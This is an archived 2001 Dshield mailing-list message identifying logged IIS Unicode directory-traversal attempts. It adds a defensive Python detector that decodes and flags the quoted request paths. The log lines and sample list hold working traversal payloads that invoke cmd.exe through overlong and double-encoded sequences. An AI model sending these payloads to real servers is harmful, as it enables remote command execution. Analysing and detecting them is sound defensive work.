[Dshield] win32 exploit?

Ed Ravin eravin at panix.com
Fri Aug 3 21:16:48 GMT 2001


Looks like one of those exploits that tricks IIS into breaking out of its
scripts subdirectory and running arbitrary commands.  The %xx characters
are things that evaluate to either periods or backslashes in Unicode,
and bypass IIS's tests to prevent you from going up one directory, at
least if your IIS server hasn't been patched in the last few months.

Joseph Shraibman writes:
> 
> Does anyone know what this is?
> 
> 216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
> 
> [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
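
Added example, not part of the original message or of any Dshield tooling: a Python check that applies the decoding described in the reply to the request paths from the quoted log lines and reports why each one is suspicious. Function names are hypothetical, the third sample path is shortened from the log, and treating more than one percent-decoding round as double encoding is an assumption of this sketch.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: request paths taken from the quoted log lines
# (third one shortened), plus one benign path for contrast.
SAMPLE_PATHS = [
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir",
    "/scripts/report.asp?id=7",
]

# A 2-byte UTF-8 sequence led by C0 or C1 always encodes a value below 0x80,
# so it is an overlong form of a plain ASCII character.
OVERLONG_2BYTE = re.compile(rb"[\xc0\xc1][\x80-\xbf]")

def decode_fully(path, max_rounds=5):
    """Percent-decode until stable; return (bytes, rounds that changed the data)."""
    data, rounds = path.encode("latin-1"), 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    return data, rounds

def fold_overlong(data):
    """Replace each overlong 2-byte sequence with the ASCII byte it encodes."""
    return OVERLONG_2BYTE.sub(
        lambda m: bytes([((m.group()[0] & 0x1F) << 6) | (m.group()[1] & 0x3F)]),
        data)

def inspect(request_path):
    """Return the list of findings for the path part of a logged request."""
    path = request_path.split("?", 1)[0]       # ignore the query string
    raw, rounds = decode_fully(path)
    folded = fold_overlong(raw)                # %c0%af -> '/', %c1%9c -> '\'
    findings = []
    if rounds > 1:
        findings.append("double-encoding")     # e.g. %255c -> %5c -> '\'
    if folded != raw:
        findings.append("overlong-utf8")
    # Treat '\' like '/' the way a Windows server would, then look for '..'
    if b".." in folded.replace(b"\\", b"/").split(b"/"):
        findings.append("traversal")
    return findings

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(inspect(p) or ["clean"], p)
```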



